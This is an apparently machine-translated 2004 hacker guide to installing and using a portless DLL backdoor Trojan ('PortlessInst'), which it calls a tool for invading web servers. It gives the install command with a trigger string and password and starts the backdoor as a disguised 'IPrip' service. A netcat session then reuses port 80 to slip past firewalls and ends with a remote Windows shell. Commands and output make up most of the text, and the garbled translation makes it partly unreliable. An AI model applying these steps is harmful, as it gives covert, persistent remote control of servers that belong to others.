DLL back door portless installation manual
HELP Document Write by Heiyeluren04 / 02/01
(The article written in this year, take it out, I wrote after my research, I didn't see the help documentation of the back door, but I have no technical content, just commemorate, huh, huh)
Portless Trojans are Trojans in the DLL class, using port multiplexing technology, you can bypass a lot of firewalls, an excellent tool for invasive web servers as a back door. What is port multiplexing technology, is to bind through some ports already used Our shell, generally, those ports are the port allowed by the firewall, and will not be killed.
PortlessSt installation format: portlessinst.exe -install
The back door is installed as a service called IPrip, then it is generally installed: NET START IPRIP is started.
Use the NC class tool to connect: NC -VV alignment IP address 80 port // Because only 80 ports are allowed, because there is a firewall and enter the feature string and port, the command is:
Let us exemplify: 1. Install C: /> PortlessInstportless v1.1 installer by Wineggdrop
USAGE: PortlessInst -Install ActiveString Passwordusage: PortlessInst -Set ActiveString Passwordusage: PortnessInst -unInstall
C: /> portlessinst.exe -install xhl heiyeluren // We use XHL as a feature string, use Heiyeluren as the connection password
C: /> NET Start IPrip // Start our installation service
2. Connect C: /> NC -VV 192.168.0.2 80
DNS FWD / Rev Mismatch: LocalHost! = HYSWLOCALHOST [192.168.0.2] 80 (http) OpenXHL: 80 // Input Features Strings and ports to bind the shell 80
HTTP / 1.1 400 Bad RequestServer: Microsoft-IIS / 5.1Date: Sun, 01 Feb 2004 02:35:23 Gmtcontent-Type: Text / HTMLCONTENT-TYPE: 87
C: /> nc -vv 192.168.0.2 80Waring: inverse host lookup failed for 192.168.0.2: h_error 11804: NO_DATAlocalhost [192.168.0.2] 80 (http) openEnter Password: heiyeluren // prompted for a password, we enter heiyeluren Welcome To Portless Backdoor
C: / windows / system32> // has already gained shell
HELP Document Write by Heiyeluren04 / 02/01